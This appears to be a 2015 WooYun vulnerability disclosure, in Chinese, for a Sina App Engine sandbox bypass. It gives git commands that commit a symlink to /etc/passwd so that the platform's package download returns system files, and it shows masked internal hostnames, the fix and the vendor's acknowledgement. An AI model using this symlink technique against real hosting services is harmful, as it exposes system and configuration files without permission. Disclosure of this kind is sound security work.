乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-05: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
测试另一个洞,没注意被送了一个。。。定期打卡
类似这个洞,也是链接文件造成的沙盒绕过: WooYun: 绕过新浪SAE沙盒读取系统任意文件 sae在应用打包下载的时候,会将链接文件所指向文件一起打包起来,导致绕过沙盒读取任意文件。首先在git提交代码的时候,建立链接文件:
ln -s /etc/passwd passwdgit add .git commit -m "123"git push
应用页面有一处下载:
下载后解压缩,目标文件就躺在那里了:
包括hosts文件,比较敏感我就打码了。只要有权限即可下载,沙盒什么的都无视掉:
*****.localdoma**********0.svndepl********************master.**********alert.sae**********image.sae**********igger.sae**********igger.sae**********orm.sae.s**********eploy.sae********** mail.sae**********queue.sae**********askqueue.sae********** rank.sae**********djob.sae.s********** stor.sae********** log.sae**********pvuip.sae**********inter.sae********** s3.sae**********otice.sae********** ms.sae**********vcode.sae********** diag.sae********** api.sae**********eploy.sae**********i.svn.sae**********t.sws.sae**********r.sws.sae**********ect.tools.**********annel.sae********************nitor.sae.********** admin.sae**********aemc.sae.s********************churl.sae**********gment.sae********** push.sae**********aepush.sae********** fts.sae********************h.sws.sae**********h.sws.sae**********.sws.sae.s**********.sws.sae.s**********.sws.sae.s**********n.sws.sae.********************odefs.sae**********odefs.sae.******************** mcx.sae**********.mail.sae********************m3307.sae**********sql.sae.s**********pmysql.sae**********c.sae.sin**********query.sae.**********fetch.sae.**********se.sae.si**********oop.sae.s**********amcx.sae.********************ysql.sae.s**********mysql.sae.**********mysql.sae.**********6.sae.sin**********6.sae.sin**********i.sinacl**************************************************ger.sina**********ck.sae.s**********pi.sae.s******************************internal.sa*****
见上面。
禁止打包链接文件。
危害等级:高
漏洞Rank:10
确认时间:2015-08-06 11:43
感谢提醒,已经通知业务整改
暂无
